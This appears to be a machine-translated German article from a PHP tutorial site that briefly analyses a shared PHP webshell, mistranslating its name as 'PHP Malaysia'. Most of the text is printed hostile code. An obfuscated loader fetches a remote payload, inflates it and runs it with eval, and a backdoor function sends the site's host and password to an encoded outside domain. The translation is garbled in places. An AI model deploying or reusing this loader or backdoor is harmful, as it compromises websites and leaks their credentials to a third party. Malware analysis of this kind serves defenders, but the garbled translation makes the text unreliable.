Heim >Backend-Entwicklung >PHP-Problem >Was ist PHP Malaysia?
Was ist PHP Malaysia?
- (*-*)浩Original
- 2019-10-09 13:51:135570Durchsuche
DaMa: bezieht sich auf den Trojaner-Virus; PHP Dama ist ein in PHP geschriebenes Programm zum Extrahieren von Site-Berechtigungen; es wird als Trojaner bezeichnet, da es die Funktion hat, Rechte zu erhöhen oder die Site zu ändern.
Jemand hat ein PHP Malaysia geteilt (angeblich, es sei über WAF), von dem 80 % eine Hintertür haben, und ich Habe eine kurze Analyse gemacht (Empfohlenes Lernen: PHP-Video-Tutorial)
<?php
$password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>Es gibt insgesamt drei Variablen, $url, $get, $un. Konvertieren Sie zunächst mehrere Variablen in ASCII Um zu sehen, was es ist, verwenden Sie einfach echo, um es auszugeben.
Es ist eine einfache Verschlüsselung basierend auf Base64 plus Gzinflate
Backdoor-Teil:
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('');
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
GetHtml($url);
}Das obige ist der detaillierte Inhalt vonWas ist PHP Malaysia?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!